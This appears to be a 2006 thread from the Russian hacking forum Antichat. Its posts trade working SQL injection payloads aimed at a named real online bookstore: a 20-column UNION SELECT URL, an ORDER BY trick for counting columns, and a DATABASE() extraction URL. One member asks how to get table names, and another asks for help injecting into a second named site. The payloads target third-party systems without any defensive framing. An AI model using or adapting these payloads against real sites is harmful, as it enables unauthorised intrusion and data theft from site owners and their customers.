Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

02.05.2006, 12:24
|
|
Новичок
Регистрация: 02.05.2006
Сообщений: 2
Провел на форуме: 14433
Репутация:
0
|
|
SQL-injection
|
|
|

02.05.2006, 13:06
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
|
|
|

02.05.2006, 13:46
|
|
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме: 3730496
Репутация:
519
|
|
Сообщение от virgoz
http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
[flame]
в этом случае проще количество столбцов перебирать вот таким способом:
__http://site.com/index.php?Lev=product_info&id=-1'+order by x/*
x = 1 ... n
Если при x = n вылетает ошибка то количество столбцов n-1
В этом случае ошибка вылетает при х=21
http://kniga.com.ua/index.php?Lev=product_info&id=-883' order by 21/*
[/flame]
ЗЫ: сорри за флейм просто не удержался и запостил когда увидел такую длинную ссылку 
|
|
|

02.05.2006, 16:03
|
|
Новичок
Регистрация: 02.05.2006
Сообщений: 2
Провел на форуме: 14433
Репутация:
0
|
|
А не подскажете как узнать имя таблицы через sql-injection? На примере с www.kinga.com.ua.
Например узнать имя БД : вместо null подставить DATABASE(). Есть ли в MySQL такие средства?
|
|
|

21.05.2006, 13:15
|
|
Новичок
Регистрация: 21.05.2006
Сообщений: 7
Провел на форуме: 24675
Репутация:
0
|
|
Сообщение от [alg0n
А не подскажете как узнать имя таблицы через sql-injection? На примере с www.kinga.com.ua.
Например узнать имя БД : вместо null подставить DATABASE(). Есть ли в MySQL такие средства?
http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,DATABASE(),4,5,6,7,8,9,10,11 ,12,13,14 ,15,16,17,18,19,20/*
Народ, может и не тут пишу, но нужно узнать возмжна ли sql-injection на сайте http://www.e-d.lt/?ru=1117522100' и если можно пример, для меня это очень важно.
Последний раз редактировалось Metvill; 24.05.2006 в 16:57..
|
|
|

24.05.2006, 16:57
|
|
Новичок
Регистрация: 21.05.2006
Сообщений: 7
Провел на форуме: 24675
Репутация:
0
|
|
а вопрос то кажется несложным, чтож так никто и не знает?
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|